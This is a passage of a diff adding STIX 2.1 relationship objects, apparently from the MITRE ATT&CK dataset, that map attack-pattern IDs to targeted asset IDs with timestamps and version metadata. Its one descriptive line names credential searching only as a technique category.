"x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d691ece2-dfdc-47c6-a23b-1d53b6e2608a", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d6a7807f-f160-4451-a280-489da729850b", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d6c084d6-91c9-47c3-a621-dba0110ed308", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d6d29b1b-85f3-483a-8c27-be247ce61e79", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d70e478f-97e1-4334-9368-59ee1bfd2924", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d72345d2-fb6f-469c-85d9-e5366846006c", + "created": "2024-06-27T09:44:06.688Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:44:06.688Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d7541a43-b590-4a6f-ab51-6497bc8c9641", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d760c31c-d3c9-4336-a2aa-0351b0800171", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d76270aa-32e1-4c2e-b4d0-94d21a99f840", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d7642c6e-5d24-4f68-870b-79189aeeff6d", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d775a6ed-4a60-41f4-ac06-da86c27cd1de", + "created": "2023-09-29T18:48:41.176Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:48:41.176Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d78c7540-6934-4ea5-b354-ade71e315328", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d7b07d40-fbdb-41e9-b610-57de10fa41e5", + "created": "2023-09-28T20:29:50.745Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:29:50.745Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d7bd4642-84ea-4e45-bbed-dacb37119b2e", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d7bfaba8-f351-4b0f-81fc-8c64e0d12df1", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d7c9b532-2951-4488-b318-673140cf419c", + "created": "2024-06-27T08:54:15.542Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:54:15.542Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e49920b0-6c54-40c1-9571-73723653205f", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d7dd3282-8206-4c2f-b987-e3849a137f9e", + "created": "2024-06-21T14:12:20.268Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.268Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d7e95f31-c6a1-4e79-a029-4576713b28fb", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d80f9deb-ba2a-4a07-aa23-81c423cf4a18", + "created": "2023-09-29T16:46:01.992Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:46:01.992Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d8378ea1-e937-4458-b389-8d4d03cedbf7", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d87aed87-9ce6-4a9d-a7f6-71206ab3fdb3", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d89d9778-4695-4c97-bf6d-1d0fbabb41fa", + "created": "2023-09-28T21:14:51.778Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:14:51.778Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d8a5f891-86e5-4bd9-a826-503ca98633e2", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d8a974c4-a214-492f-9f83-d826444dbb47", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d8d4176f-a894-4341-9862-71ddddd43697", + "created": "2024-06-26T15:35:47.453Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:35:47.453Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d8d44067-44b5-47b4-b349-9840a4aa8b2c", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d8e14bf7-1335-4539-88e3-2669d9d8c053", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d8f95008-33c9-4572-9916-023d8de449b1", + "created": "2023-09-29T18:04:16.785Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:04:16.785Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d91e7e23-13e3-4c0a-847f-ffffb23f7ea8", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d948a3b2-4873-4175-be18-ddef1c20347d", + "created": "2020-03-09T13:51:07.152Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d9492859-9851-4a35-84f6-ba378e5ce72f", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d966deb7-6f6a-4888-a92c-8fb60b765733", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d96788b4-55dd-48df-bb9b-83b33ca24813", + "created": "2023-09-28T19:55:22.376Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:55:22.376Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d96f7f85-69df-4216-8470-3dd6e58db764", + "created": "2024-05-22T17:23:44.104Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:33:21.338Z", + "description": "Asset Mapping Rationale: Adversaries may search compromised systems to find and obtain insecurely stored credentials. ", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d98fd25b-9e6e-4f6a-9a77-d4172db5ad2d", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d99fdb59-6758-48a1-b1d7-ff75f6bf415a", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d9b2ae0b-8d2b-48f1-b67c-c51005550050", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d9bc2e74-1e33-4ded-b913-5577ab0a5b3c", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d9cab2ae-ffe4-45c7-9994-34702066ad17", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": 